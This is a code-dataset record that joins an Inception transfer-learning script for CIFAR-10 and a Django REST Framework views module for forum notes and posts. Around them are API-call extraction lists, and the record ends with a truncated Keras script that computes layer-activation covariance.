inception.maybe_download()
# Loading the inception model so that we can inialized it with the pretrained weights and customize for our model
inception_model = inception.Inception()
file_path_train = os.path.join(cifar10.data_path, 'inception_cifar10_train.pkl')
file_path_test = os.path.join(cifar10.data_path, 'inception_cifar10_test.pkl')
print("Processing Inception transfer-values for the training images of Cifar-10 ...")
# First we need to scale the imgs to fit the Inception model requirements as it requires all pixels to be from 0 to 255,
# while our training examples of the CIFAR-10 pixels are between 0.0 and 1.0
imgs_scaled = training_images * 255.0
# Checking if the transfer-values for our training images are already calculated and loading them, if not calcaulate and save them.
transfer_values_training = transfer_values_cache(cache_path=file_path_train,
images=imgs_scaled,
model=inception_model)
print("Processing Inception transfer-values for the testing images of Cifar-10 ...")
# First we need to scale the imgs to fit the Inception model requirements as it requires all pixels to be from 0 to 255,
# while our training examples of the CIFAR-10 pixels are between 0.0 and 1.0
imgs_scaled = testing_images * 255.0
# Checking if the transfer-values for our training images are already calculated and loading them, if not calcaulate and save them.
transfer_values_testing = transfer_values_cache(cache_path=file_path_test,
images=imgs_scaled,
model=inception_model)
print('Shape of the training set transfer values...')
print(transfer_values_training.shape)
print('Shape of the testing set transfer values...')
print(transfer_values_testing.shape)
def plot_transferValues(ind):
print("Original input image:")
# Plot the image at index ind of the test set.
plt.imshow(testing_images[ind], interpolation='nearest')
plt.show()
print("Transfer values using Inception model:")
# Visualize the transfer values as an image.
transferValues_img = transfer_values_testing[ind]
transferValues_img = transferValues_img.reshape((32, 64))
# Plotting the transfer values image.
plt.imshow(transferValues_img, interpolation='nearest', cmap='Reds')
plt.show()
plot_transferValues(ind=15)
pca_obj = PCA(n_components=2)
subset_transferValues = transfer_values_training[0:3000]
cls_integers = testing_cls_integers[0:3000]
print('Shape of a subset form the transfer values...')
print(subset_transferValues.shape)
reduced_transferValues = pca_obj.fit_transform(subset_transferValues)
print('Shape of the reduced version of the transfer values...')
print(reduced_transferValues.shape)
def plot_reduced_transferValues(transferValues, cls_integers):
# Create a color-map with a different color for each class.
c_map = color_map.rainbow(np.linspace(0.0, 1.0, num_classes))
# Getting the color for each sample.
colors = c_map[cls_integers]
# Getting the x and y values.
x_val = transferValues[:, 0]
y_val = transferValues[:, 1]
# Plot the transfer values in a scatter plot
plt.scatter(x_val, y_val, color=colors)
plt.show()
plot_reduced_transferValues(reduced_transferValues, cls_integers)
pca_obj = PCA(n_components=50)
transferValues_50d = pca_obj.fit_transform(subset_transferValues)
tsne_obj = TSNE(n_components=2)
reduced_transferValues = tsne_obj.fit_transform(transferValues_50d)
print('Shape of the reduced version of the transfer values using t-SNE method...')
print(reduced_transferValues.shape)
plot_reduced_transferValues(reduced_transferValues, cls_integers)
transferValues_arrLength = inception_model.transfer_len
input_values = tf.placeholder(tf.float32, shape=[None, transferValues_arrLength], name='input_values')
y_actual = tf.placeholder(tf.float32, shape=[None, num_classes], name='y_actual')
y_actual_cls = tf.argmax(y_actual, axis=1)
def new_weights(shape):
return tf.Variable(tf.truncated_normal(shape, stddev=0.05))
def new_biases(length):
return tf.Variable(tf.constant(0.05, shape=[length]))
def new_fc_layer(input, # The previous layer.
num_inputs, # Num. inputs from prev. layer.
num_outputs, # Num. outputs.
use_relu=True): # Use Rectified Linear Unit (ReLU)?
# Create new weights and biases.
weights = new_weights(shape=[num_inputs, num_outputs])
biases = new_biases(length=num_outputs)
# Calculate the layer as the matrix multiplication of
# the input and weights, and then add the bias-values.
layer = tf.matmul(input, weights) + biases
# Use ReLU?
if use_relu:
layer = tf.nn.relu(layer)
return layer
# First fully-connected layer.
layer_fc1 = new_fc_layer(input=input_values,
num_inputs=2048,
num_outputs=1024,
use_relu=True)
# Second fully-connected layer.
layer_fc2 = new_fc_layer(input=layer_fc1,
num_inputs=1024,
num_outputs=num_classes,
use_relu=False)
# Predicted class-label.
y_predicted = tf.nn.softmax(layer_fc2)
# Cross-entropy for the classification of each image.
cross_entropy = \
tf.nn.softmax_cross_entropy_with_logits(logits=layer_fc2,
labels=y_actual)
# Loss aka. cost-measure.
# This is the scalar value that must be minimized.
loss = tf.reduce_mean(cross_entropy)
step = tf.Variable(initial_value=0,
name='step', trainable=False)
optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(loss, step)
y_predicted_cls = tf.argmax(y_predicted, axis=1)
correct_prediction = tf.equal(y_predicted_cls, y_actual_cls)
model_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
session = tf.Session()
session.run(tf.global_variables_initializer())
training_batch_size = 32
def select_random_batch():
# Number of images (transfer-values) in the training-set.
num_imgs = len(transfer_values_training)
# Create a random index.
ind = np.random.choice(num_imgs,
size=training_batch_size,
replace=False)
# Use the random index to select random x and y-values.
# We use the transfer-values instead of images as x-values.
x_batch = transfer_values_training[ind]
y_batch = trainig_one_hot_labels[ind]
return x_batch, y_batch
def optimize(num_iterations):
for i in range(num_iterations):
# Selectin a random batch of images for training
# where the transfer values of the images will be stored in input_batch
# and the actual labels of those batch of images will be stored in y_actual_batch
input_batch, y_actual_batch = select_random_batch()
# storing the batch in a dict with the proper names
# such as the input placeholder variables that we define above.
feed_dict = {input_values: input_batch,
y_actual: y_actual_batch}
# Now we call the optimizer of this batch of images
# TensorFlow will automatically feed the values of the dict we created above
# to the model input placeholder variables that we defined above.
i_global, _ = session.run([step, optimizer],
feed_dict=feed_dict)
# print the accuracy every 100 steps.
if (i_global % 100 == 0) or (i == num_iterations - 1):
# Calculate the accuracy on the training-batch.
batch_accuracy = session.run(model_accuracy,
feed_dict=feed_dict)
msg = "Step: {0:>6}, Training Accuracy: {1:>6.1%}"
print(msg.format(i_global, batch_accuracy))
def plot_errors(cls_predicted, cls_correct):
# cls_predicted is an array of the predicted class-number for
# all images in the test-set.
# cls_correct is an array with boolean values to indicate
# whether is the model predicted the correct class or not.
# Negate the boolean array.
incorrect = (cls_correct == False)
# Get the images from the test-set that have been
# incorrectly classified.
incorrectly_classified_images = testing_images[incorrect]
# Get the predicted classes for those images.
cls_predicted = cls_predicted[incorrect]
# Get the true classes for those images.
true_class = testing_cls_integers[incorrect]
n = min(9, len(incorrectly_classified_images))
# Plot the first n images.
plot_imgs(imgs=incorrectly_classified_images[0:n],
true_class=true_class[0:n],
predicted_class=cls_predicted[0:n])
def plot_confusionMatrix(cls_predicted):
# cls_predicted array of all the predicted
# classes numbers in the test.
# Call the confucion matrix of sklearn
cm = confusion_matrix(y_true=testing_cls_integers,
y_pred=cls_predicted)
# Printing the confusion matrix
for i in range(num_classes):
# Append the class-name to each line.
class_name = "({}) {}".format(i, class_names[i])
print(cm[i, :], class_name)
# labeling each column of the confusion matrix with the class number
cls_numbers = [" ({0})".format(i) for i in range(num_classes)]
print("".join(cls_numbers))
# Split the data-set in batches of this size to limit RAM usage.
batch_size = 128
def predict_class(transferValues, labels, cls_true):
# Number of images.
num_imgs = len(transferValues)
# Allocate an array for the predicted classes which
# will be calculated in batches and filled into this array.
cls_predicted = np.zeros(shape=num_imgs, dtype=np.int)
# Now calculate the predicted classes for the batches.
# We will just iterate through all the batches.
# There might be a more clever and Pythonic way of doing this.
# The starting index for the next batch is denoted i.
i = 0
while i < num_imgs:
# The ending index for the next batch is denoted j.
j = min(i + batch_size, num_imgs)
# Create a feed-dict with the images and labels
# between index i and j.
feed_dict = {input_values: transferValues[i:j],
y_actual: labels[i:j]}
# Calculate the predicted class using TensorFlow.
cls_predicted[i:j] = session.run(y_predicted_cls, feed_dict=feed_dict)
# Set the start-index for the next batch to the
# end-index of the current batch.
i = j
# Create a boolean array whether each image is correctly classified.
correct = [a == p for a, p in zip(cls_true, cls_predicted)]
print(type(correct))
return correct, cls_predicted
def predict_class_test():
return predict_class(transferValues = transfer_values_testing,
labels = trainig_one_hot_labels,
cls_true = training_cls_integers)
def classification_accuracy(correct):
# When averaging a boolean array, False means 0 and True means 1.
# So we are calculating: number of True / len(correct) which is
# the same as the classification accuracy.
# Return the classification accuracy
# and the number of correct classifications.
return np.mean(correct), np.sum(correct)
def test_accuracy(show_example_errors=False,
show_confusion_matrix=False):
# For all the images in the test-set,
# calculate the predicted classes and whether they are correct.
correct, cls_pred = predict_class_test()
print(type(correct))
# Classification accuracypredict_class_test and the number of correct classifications.
accuracy, num_correct = classification_accuracy(correct)
# Number of images being classified.
num_images = len(correct)
# Print the accuracy.
msg = "Test set accuracy: {0:.1%} ({1} / {2})"
print(msg.format(accuracy, num_correct, num_images))
# Plot some examples of mis-classifications, if desired.
if show_example_errors:
print("Example errors:")
plot_errors(cls_predicted=cls_pred, cls_correct=correct)
# Plot the confusion matrix, if desired.
if show_confusion_matrix:
print("Confusion Matrix:")
plot_confusionMatrix(cls_predicted=cls_pred)
test_accuracy(show_example_errors=True,
show_confusion_matrix=True)
optimize(num_iterations=1000)
test_accuracy(show_example_errors=True,
show_confusion_matrix=True) | [
"tensorflow.equal",
"tensorflow.nn.softmax",
"cifar10.load_training_data",
"inception.Inception",
"tensorflow.reduce_mean",
"tensorflow.cast",
"matplotlib.pyplot.imshow",
"numpy.mean",
"sklearn.decomposition.PCA",
"tensorflow.placeholder",
"tensorflow.Session",
"inception.maybe_download",
"s... | [((574, 610), 'cifar10.maybe_download_and_extract', 'cifar10.maybe_download_and_extract', ([], {}), '()\n', (608, 610), False, 'import cifar10\n'), ((626, 652), 'cifar10.load_class_names', 'cifar10.load_class_names', ([], {}), '()\n', (650, 652), False, 'import cifar10\n'), ((775, 803), 'cifar10.load_training_data', 'cifar10.load_training_data', ([], {}), '()\n', (801, 803), False, 'import cifar10\n'), ((901, 925), 'cifar10.load_test_data', 'cifar10.load_test_data', ([], {}), '()\n', (923, 925), False, 'import cifar10\n'), ((2629, 2655), 'inception.maybe_download', 'inception.maybe_download', ([], {}), '()\n', (2653, 2655), False, 'import inception\n'), ((2789, 2810), 'inception.Inception', 'inception.Inception', ([], {}), '()\n', (2808, 2810), False, 'import inception\n'), ((2830, 2892), 'os.path.join', 'os.path.join', (['cifar10.data_path', '"""inception_cifar10_train.pkl"""'], {}), "(cifar10.data_path, 'inception_cifar10_train.pkl')\n", (2842, 2892), False, 'import os\n'), ((2910, 2971), 'os.path.join', 'os.path.join', (['cifar10.data_path', '"""inception_cifar10_test.pkl"""'], {}), "(cifar10.data_path, 'inception_cifar10_test.pkl')\n", (2922, 2971), False, 'import os\n'), ((3456, 3553), 'inception.transfer_values_cache', 'transfer_values_cache', ([], {'cache_path': 'file_path_train', 'images': 'imgs_scaled', 'model': 'inception_model'}), '(cache_path=file_path_train, images=imgs_scaled, model\n =inception_model)\n', (3477, 3553), False, 'from inception import transfer_values_cache\n'), ((4122, 4218), 'inception.transfer_values_cache', 'transfer_values_cache', ([], {'cache_path': 'file_path_test', 'images': 'imgs_scaled', 'model': 'inception_model'}), '(cache_path=file_path_test, images=imgs_scaled, model=\n inception_model)\n', (4143, 4218), False, 'from inception import transfer_values_cache\n'), ((5073, 5092), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': '(2)'}), '(n_components=2)\n', (5076, 5092), False, 'from sklearn.decomposition import PCA\n'), ((6016, 6036), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': '(50)'}), '(n_components=50)\n', (6019, 6036), False, 'from sklearn.decomposition import PCA\n'), ((6114, 6134), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)'}), '(n_components=2)\n', (6118, 6134), False, 'from sklearn.manifold import TSNE\n'), ((6463, 6555), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, transferValues_arrLength]', 'name': '"""input_values"""'}), "(tf.float32, shape=[None, transferValues_arrLength], name=\n 'input_values')\n", (6477, 6555), True, 'import tensorflow as tf\n'), ((6562, 6632), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, num_classes]', 'name': '"""y_actual"""'}), "(tf.float32, shape=[None, num_classes], name='y_actual')\n", (6576, 6632), True, 'import tensorflow as tf\n'), ((6648, 6675), 'tensorflow.argmax', 'tf.argmax', (['y_actual'], {'axis': '(1)'}), '(y_actual, axis=1)\n', (6657, 6675), True, 'import tensorflow as tf\n'), ((7953, 7977), 'tensorflow.nn.softmax', 'tf.nn.softmax', (['layer_fc2'], {}), '(layer_fc2)\n', (7966, 7977), True, 'import tensorflow as tf\n'), ((8055, 8129), 'tensorflow.nn.softmax_cross_entropy_with_logits', 'tf.nn.softmax_cross_entropy_with_logits', ([], {'logits': 'layer_fc2', 'labels': 'y_actual'}), '(logits=layer_fc2, labels=y_actual)\n', (8094, 8129), True, 'import tensorflow as tf\n'), ((8263, 8292), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['cross_entropy'], {}), '(cross_entropy)\n', (8277, 8292), True, 'import tensorflow as tf\n'), ((8301, 8359), 'tensorflow.Variable', 'tf.Variable', ([], {'initial_value': '(0)', 'name': '"""step"""', 'trainable': '(False)'}), "(initial_value=0, name='step', trainable=False)\n", (8312, 8359), True, 'import tensorflow as tf\n'), ((8482, 8512), 'tensorflow.argmax', 'tf.argmax', (['y_predicted'], {'axis': '(1)'}), '(y_predicted, axis=1)\n', (8491, 8512), True, 'import tensorflow as tf\n'), ((8534, 8573), 'tensorflow.equal', 'tf.equal', (['y_predicted_cls', 'y_actual_cls'], {}), '(y_predicted_cls, y_actual_cls)\n', (8542, 8573), True, 'import tensorflow as tf\n'), ((8659, 8671), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (8669, 8671), True, 'import tensorflow as tf\n'), ((1250, 1268), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(3)', '(3)'], {}), '(3, 3)\n', (1262, 1268), True, 'import matplotlib.pyplot as plt\n'), ((2334, 2344), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2342, 2344), True, 'import matplotlib.pyplot as plt\n'), ((4611, 4667), 'matplotlib.pyplot.imshow', 'plt.imshow', (['testing_images[ind]'], {'interpolation': '"""nearest"""'}), "(testing_images[ind], interpolation='nearest')\n", (4621, 4667), True, 'import matplotlib.pyplot as plt\n'), ((4672, 4682), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4680, 4682), True, 'import matplotlib.pyplot as plt\n'), ((4949, 5017), 'matplotlib.pyplot.imshow', 'plt.imshow', (['transferValues_img'], {'interpolation': '"""nearest"""', 'cmap': '"""Reds"""'}), "(transferValues_img, interpolation='nearest', cmap='Reds')\n", (4959, 5017), True, 'import matplotlib.pyplot as plt\n'), ((5022, 5032), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5030, 5032), True, 'import matplotlib.pyplot as plt\n'), ((5882, 5921), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x_val', 'y_val'], {'color': 'colors'}), '(x_val, y_val, color=colors)\n', (5893, 5921), True, 'import matplotlib.pyplot as plt\n'), ((5926, 5936), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5934, 5936), True, 'import matplotlib.pyplot as plt\n'), ((8607, 8646), 'tensorflow.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (8614, 8646), True, 'import tensorflow as tf\n'), ((8684, 8717), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (8715, 8717), True, 'import tensorflow as tf\n'), ((8920, 8987), 'numpy.random.choice', 'np.random.choice', (['num_imgs'], {'size': 'training_batch_size', 'replace': '(False)'}), '(num_imgs, size=training_batch_size, replace=False)\n', (8936, 8987), True, 'import numpy as np\n'), ((11696, 11763), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', ([], {'y_true': 'testing_cls_integers', 'y_pred': 'cls_predicted'}), '(y_true=testing_cls_integers, y_pred=cls_predicted)\n', (11712, 11763), False, 'from sklearn.metrics import confusion_matrix\n'), ((12511, 12549), 'numpy.zeros', 'np.zeros', ([], {'shape': 'num_imgs', 'dtype': 'np.int'}), '(shape=num_imgs, dtype=np.int)\n', (12519, 12549), True, 'import numpy as np\n'), ((5616, 5650), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1.0)', 'num_classes'], {}), '(0.0, 1.0, num_classes)\n', (5627, 5650), True, 'import numpy as np\n'), ((6724, 6763), 'tensorflow.truncated_normal', 'tf.truncated_normal', (['shape'], {'stddev': '(0.05)'}), '(shape, stddev=0.05)\n', (6743, 6763), True, 'import tensorflow as tf\n'), ((6813, 6846), 'tensorflow.constant', 'tf.constant', (['(0.05)'], {'shape': '[length]'}), '(0.05, shape=[length])\n', (6824, 6846), True, 'import tensorflow as tf\n'), ((7358, 7383), 'tensorflow.matmul', 'tf.matmul', (['input', 'weights'], {}), '(input, weights)\n', (7367, 7383), True, 'import tensorflow as tf\n'), ((7443, 7460), 'tensorflow.nn.relu', 'tf.nn.relu', (['layer'], {}), '(layer)\n', (7453, 7460), True, 'import tensorflow as tf\n'), ((8399, 8443), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0001)'}), '(learning_rate=0.0001)\n', (8421, 8443), True, 'import tensorflow as tf\n'), ((14099, 14115), 'numpy.mean', 'np.mean', (['correct'], {}), '(correct)\n', (14106, 14115), True, 'import numpy as np\n'), ((14117, 14132), 'numpy.sum', 'np.sum', (['correct'], {}), '(correct)\n', (14123, 14132), True, 'import numpy as np\n')] |
from rest_framework.exceptions import NotFound, PermissionDenied
from rest_framework.generics import (
CreateAPIView,
DestroyAPIView,
RetrieveUpdateAPIView,
)
from .permissions import (
IsAdminOrModeratorOrReadOnly,
IsOwnerOrAdminOrModeratorOrReadOnly,
IsOwnerOrReadOnly,
)
from .serializers import (
NoteSerializer,
NoteCreateUpdateSerializer,
PostCreateSerializer,
PostUpdateSerializer,
PostListSerializer,
)
from posts.models import (
Note,
Post,
)
class NoteCreateAPIView(CreateAPIView):
queryset = Note.objects.all()
serializer_class = NoteCreateUpdateSerializer
def perform_create(self, serializer):
post_id = self.request.data['post']
user_id = self.request.user.id
is_admin = self.request.user.is_staff
if serializer.is_valid(raise_exception=True):
is_moderator = Post.objects.filter(
id = post_id,
thread__subforum__moderators = user_id
).exists()
if not (is_admin or is_moderator):
raise PermissionDenied(detail='You do not have permission to perform this action.')
serializer.save(user=self.request.user)
class NoteUpdateAPIView(RetrieveUpdateAPIView):
queryset = Note.objects.all()
serializer_class = NoteCreateUpdateSerializer
permission_classes = (IsAdminOrModeratorOrReadOnly, IsOwnerOrReadOnly)
def perform_update(self, serializer):
serializer.save(user=self.request.user)
class NoteDeleteAPIView(DestroyAPIView):
queryset = Note.objects.all()
serializer_class = NoteSerializer
permission_classes = (IsAdminOrModeratorOrReadOnly, IsOwnerOrReadOnly)
class PostCreateAPIView(CreateAPIView):
queryset = Post.objects.all()
serializer_class = PostCreateSerializer
def perform_create(self, serializer):
serializer.save(user=self.request.user)
class PostUpdateAPIView(RetrieveUpdateAPIView):
queryset = Post.objects.all()
serializer_class = PostUpdateSerializer
permission_classes = (IsOwnerOrAdminOrModeratorOrReadOnly,)
class PostDeleteAPIView(DestroyAPIView):
queryset = Post.objects.all()
serializer_class = PostListSerializer
permission_classes = (IsAdminOrModeratorOrReadOnly,) | [
"posts.models.Post.objects.filter",
"posts.models.Note.objects.all",
"posts.models.Post.objects.all",
"rest_framework.exceptions.PermissionDenied"
] | [((561, 579), 'posts.models.Note.objects.all', 'Note.objects.all', ([], {}), '()\n', (577, 579), False, 'from posts.models import Note, Post\n'), ((1273, 1291), 'posts.models.Note.objects.all', 'Note.objects.all', ([], {}), '()\n', (1289, 1291), False, 'from posts.models import Note, Post\n'), ((1566, 1584), 'posts.models.Note.objects.all', 'Note.objects.all', ([], {}), '()\n', (1582, 1584), False, 'from posts.models import Note, Post\n'), ((1755, 1773), 'posts.models.Post.objects.all', 'Post.objects.all', ([], {}), '()\n', (1771, 1773), False, 'from posts.models import Note, Post\n'), ((1974, 1992), 'posts.models.Post.objects.all', 'Post.objects.all', ([], {}), '()\n', (1990, 1992), False, 'from posts.models import Note, Post\n'), ((2159, 2177), 'posts.models.Post.objects.all', 'Post.objects.all', ([], {}), '()\n', (2175, 2177), False, 'from posts.models import Note, Post\n'), ((1082, 1159), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {'detail': '"""You do not have permission to perform this action."""'}), "(detail='You do not have permission to perform this action.')\n", (1098, 1159), False, 'from rest_framework.exceptions import NotFound, PermissionDenied\n'), ((883, 952), 'posts.models.Post.objects.filter', 'Post.objects.filter', ([], {'id': 'post_id', 'thread__subforum__moderators': 'user_id'}), '(id=post_id, thread__subforum__moderators=user_id)\n', (902, 952), False, 'from posts.models import Note, Post\n')] |
#!/usr/bin/env python
from __future__ import print_function
import sys
sys.path.insert(0, "/home/liangjiang/code/keras-jl-mean/")
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
from keras.models import model_from_json
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
from keras.utils import np_utils
from keras.callbacks import EarlyStopping, LearningRateScheduler
from keras.regularizers import l2, activity_l1l2
from keras import backend as K
import argparse
import json
import numpy as np
import matplotlib.pyplot as plt
def argparser():
parser = argparse.ArgumentParser()
parser.add_argument("weight_path", action = 'store',
help = "Path of learned weight")
parser.add_argument("--layer", "-l", action = 'store', type = int, default = 1,
dest = 'layer', help = "Layer to be visualized")
return parser
def random_crop(X_train, size = (3, 3), times = 10):
num_samples = times * X_train.shape[0]
print("num_samples: ", num_samples)
row = X_train.shape[2]
col = X_train.shape[3]
crop_row = size[0]
crop_col = size[1]
random_sample = np.random.randint(0, X_train.shape[0], size = num_samples)
print("random_sample: ", random_sample)
random_col_index = np.random.randint(0, row - crop_row + 1, size = num_samples)
print("random_col_index: ", random_col_index)
random_row_index = np.random.randint(0, col - crop_col, size = num_samples)
print("random_row_index: ", random_row_index)
# cropped_x_cols = cropped_x.shape[2]
# cropped_x_rows = cropped_x.shape[3]
crop_x = np.zeros((num_samples, X_train.shape[1], crop_row, crop_col))
for i in range(num_samples):
crop_x[i, :, :, :] = X_train[random_sample[i], :,
random_row_index[i] : random_row_index[i] + crop_row,
random_col_index[i] : random_col_index[i] + crop_col]
# print("crop_x[0]: ", crop_x[0, :, :, :])
return crop_x
def main():
parser = argparser()
args = parser.parse_args()
weight_path = args.weight_path
layer = args.layer
img_rows, img_cols = 32, 32
# the CIFAR10 images are RGB
img_channels = 3
batch_size = 32
nb_classes = 10
model = Sequential()
print("Making model")
model.add(Convolution2D(32, 3, 3, border_mode='same',
input_shape=(img_channels, img_rows, img_cols),
W_regularizer = l2(l = 0.),
b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(Convolution2D(32, 3, 3,
W_regularizer = l2(l = 0.),
b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Convolution2D(64, 3, 3, border_mode='same',
W_regularizer = l2(l = 0.),
b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(Convolution2D(64, 3, 3,
W_regularizer = l2(l = 0.),
b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512, W_regularizer = l2(l = 0.), b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes, W_regularizer = l2(l = 0.), b_regularizer = l2(l = 0.)))
model.add(Activation('softmax'))
# let's train the model using SGD + momentum (how original).
print("Compiling model")
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=sgd,
metrics=['accuracy'])
print("Going to visualize layer ", layer)
print(model.layers[layer].get_config())
# load learned weight
print("Loading weight")
model.load_weights(weight_path)
weight = model.layers[0].get_weights()
print("shape of weight: ", weight[0].shape)
# generate function to get output at layer to be visualized
for i in range(len(model.layers)):
print(i)
input = model.layers[0].input
output = model.layers[layer].output
func = K.function([K.learning_phase()] + [input], output)
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
# im = X_train[100, :, :, :]
# im = np.swapaxes(im, 0, 2)
# im = np.swapaxes(im, 0, 1)
# plt.figure(1)
# plt.imshow(im)
# plt.show()
# sys.exit()
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print(X_test.shape[0], 'test samples')
crop_x = X_test
# crop_x = random_crop(X_test, size = (9, 9), times = 10)
print("shape of crop_x: ", crop_x.shape)
im = crop_x[0, :, :, :]
# print("crop_x[0]", im)
im = im * 255
im = im.astype(np.uint8)
# print("im of uint8: ", im)
fig = plt.figure()
# plt.imshow(im)
# plt.show()
# sys.exit()
# get output from layer to be visualized
# print(X_test[50][1])
activation = func([0] + [crop_x])
print("shape of activation: ", activation.shape)
# max_sample_index = np.argmax(activation, axis = 0)
# max_sample_index = max_sample_index.squeeze()
# np.savetxt("max_sample_index", max_sample_index, fmt = "%d")
# print("shape of max_sample_index: ", max_sample_index.shape)
# # print("max_29", activation[:, 29, :, :])
# for i in range(32):
# ax = fig.add_subplot(8, 4, i + 1, frameon=False)
# ax.set_xticks([])
# ax.set_yticks([])
# ax.xaxis.set_ticks_position('none')
# ax.yaxis.set_ticks_position('none')
# im = crop_x[max_sample_index[i], :, :, :]
# im = np.swapaxes(im, 0, 2)
# im = np.swapaxes(im, 1, 0)
# # print("shape of im: ", im.shape)
# im = im * 255
# im = im.astype(np.uint8)
# ax.imshow(im)
# plt.show()
if activation.ndim == 4:
num = activation.shape[0]
print("num: ", num)
col = activation.shape[1]
print("col: ", col)
map_size = activation.shape[2] * activation.shape[3]
print("map_size: ", map_size)
# temp = np.mean(activation, axis = -1)
# matrix_activation = np.mean(temp, axis = -1)
flatten_activation = np.reshape(activation, (num, col * map_size))
print("shape of flatten_activation: ", flatten_activation.shape)
trans_activation = flatten_activation.transpose()
print("shape of trans_activation: ", trans_activation.shape)
reshape_activation = np.reshape(trans_activation, (col, num * map_size))
print("shape of reshape_activation: ", reshape_activation.shape)
matrix_activation = reshape_activation.transpose()
print("shape of matrix_activation: ", matrix_activation.shape)
mean = np.mean(matrix_activation, axis = 0, keepdims = True)
# mean_p = T.printing.Print('mean')(mean)
std = np.std(matrix_activation, axis = 0, keepdims = True)
normalized_output = (matrix_activation - mean) / std
covariance = np.dot(np.transpose(normalized_output), normalized_output) / num / map_size
else:
num = activation.shape[0]
mean = np.mean(activation, axis = 0, keepdims = True)
# mean_p = T.printing.Print('mean')(mean)
std = np.std(activation, axis = 0, keepdims = True)
normalized_output = (activation - mean) / std
covariance = np.dot(np.transpose(normalized_output), normalized_output) / num
np.savetxt("mean", mean, fmt = "%f")
np.savetxt("std", std, fmt = "%f")
np.savetxt("covariance", covariance, fmt = "%f")
if "__main__" == __name__:
main()
| [
"sys.path.insert",
"keras.backend.learning_phase",
"keras.optimizers.SGD",
"keras.layers.Activation",
"numpy.mean",
"numpy.reshape",
"argparse.ArgumentParser",
"keras.layers.Flatten",
"keras.datasets.cifar10.load_data",
"keras.layers.MaxPooling2D",
"keras.models.Sequential",
"numpy.savetxt",
... | [((71, 129), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/home/liangjiang/code/keras-jl-mean/"""'], {}), "(0, '/home/liangjiang/code/keras-jl-mean/')\n", (86, 129), False, 'import sys\n'), ((734, 759), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (757, 759), False, 'import argparse\n'), ((1282, 1338), 'numpy.random.randint', 'np.random.randint', (['(0)', 'X_train.shape[0]'], {'size': 'num_samples'}), '(0, X_train.shape[0], size=num_samples)\n', (1299, 1338), True, 'import numpy as np\n'), ((1408, 1466), 'numpy.random.randint', 'np.random.randint', (['(0)', '(row - crop_row + 1)'], {'size': 'num_samples'}), '(0, row - crop_row + 1, size=num_samples)\n', (1425, 1466), True, 'import numpy as np\n'), ((1543, 1597), 'numpy.random.randint', 'np.random.randint', (['(0)', '(col - crop_col)'], {'size': 'num_samples'}), '(0, col - crop_col, size=num_samples)\n', (1560, 1597), True, 'import numpy as np\n'), ((1748, 1809), 'numpy.zeros', 'np.zeros', (['(num_samples, X_train.shape[1], crop_row, crop_col)'], {}), '((num_samples, X_train.shape[1], crop_row, crop_col))\n', (1756, 1809), True, 'import numpy as np\n'), ((2375, 2387), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (2385, 2387), False, 'from keras.models import Sequential\n'), ((3837, 3891), 'keras.optimizers.SGD', 'SGD', ([], {'lr': '(0.01)', 'decay': '(1e-06)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.01, decay=1e-06, momentum=0.9, nesterov=True)\n', (3840, 3891), False, 'from keras.optimizers import SGD\n'), ((4587, 4606), 'keras.datasets.cifar10.load_data', 'cifar10.load_data', ([], {}), '()\n', (4604, 4606), False, 'from keras.datasets import cifar10\n'), ((5214, 5226), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (5224, 5226), True, 'import matplotlib.pyplot as plt\n'), ((7873, 7907), 'numpy.savetxt', 'np.savetxt', (['"""mean"""', 'mean'], {'fmt': '"""%f"""'}), "('mean', mean, fmt='%f')\n", (7883, 7907), True, 'import numpy as np\n'), ((7914, 7946), 'numpy.savetxt', 'np.savetxt', (['"""std"""', 'std'], {'fmt': '"""%f"""'}), "('std', std, fmt='%f')\n", (7924, 7946), True, 'import numpy as np\n'), ((7953, 7999), 'numpy.savetxt', 'np.savetxt', (['"""covariance"""', 'covariance'], {'fmt': '"""%f"""'}), "('covariance', covariance, fmt='%f')\n", (7963, 7999), True, 'import numpy as np\n'), ((2683, 2701), 'keras.layers.Activation', 'Activation', 